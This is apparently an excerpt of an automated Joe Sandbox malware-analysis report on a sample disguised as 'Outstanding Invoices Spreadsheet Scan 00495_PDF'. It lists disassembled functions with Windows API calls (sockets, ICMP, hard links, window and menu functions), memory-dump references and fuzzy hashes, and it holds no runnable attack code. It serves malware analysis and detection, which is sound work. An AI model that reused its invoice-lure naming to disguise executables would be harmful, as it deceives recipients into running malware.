                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                              • String ID: HH
                                                                              • API String ID: 1515696956-2761332787
                                                                              • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                              • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                              • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                              • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                              • DrawMenuBar.USER32 ref: 00449828
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$InfoItem$Draw_malloc
                                                                              • String ID: 0
                                                                              • API String ID: 772068139-4108050209
                                                                              • Opcode ID: c1bf34fcc1747d30dc64db10822b137e08df57f5b5e3e0e896624d98b51cdafa
                                                                              • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                              • Opcode Fuzzy Hash: c1bf34fcc1747d30dc64db10822b137e08df57f5b5e3e0e896624d98b51cdafa
                                                                              • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AllocTask_wcslen
                                                                              • String ID: hkG
                                                                              • API String ID: 2651040394-3610518997
                                                                              • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                              • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                              • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                              • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                              • API String ID: 2574300362-1816364905
                                                                              • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                              • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                              • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                              • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpSendEcho
                                                                              • API String ID: 2574300362-58917771
                                                                              • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                              • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                              • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                              • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpCloseHandle
                                                                              • API String ID: 2574300362-3530519716
                                                                              • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                              • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                              • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                              • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: ICMP.DLL$IcmpCreateFile
                                                                              • API String ID: 2574300362-275556492
                                                                              • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                              • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                              • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                              • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                              • API String ID: 2574300362-3024904723
                                                                              • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                              • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                              • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                              • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 1a7542f65731b18e8f30e1f0bc9f67a59ef38278baa9d797face9e247176fe19
                                                                              • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                              • Opcode Fuzzy Hash: 1a7542f65731b18e8f30e1f0bc9f67a59ef38278baa9d797face9e247176fe19
                                                                              • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                              • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                              • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 2286883814-0
                                                                              • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                              • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                              • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                              • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                              • #21.WSOCK32 ref: 004740E0
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$socket
                                                                              • String ID:
                                                                              • API String ID: 1881357543-0
                                                                              • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                              • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                              • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                              • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                              APIs
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                              • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                              • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                              • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                              • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                              • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                              • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                              • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                              • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                              • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                              • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                              • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 3321077145-0
                                                                              • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                              • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                              • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                              • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 004505BF
                                                                              • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                              • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                              • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Proc$Parent
                                                                              • String ID:
                                                                              • API String ID: 2351499541-0
                                                                              • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                              • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                              • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                              • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                              APIs
                                                                                • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                              • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                              • __itow.LIBCMT ref: 00461461
                                                                              • __itow.LIBCMT ref: 004614AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2875217250-0
                                                                              • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                              • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                              • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                              • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00472806
                                                                                • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                              • GetCaretPos.USER32(?), ref: 0047281A
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                              • GetForegroundWindow.USER32 ref: 0047285C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                              • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                              • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
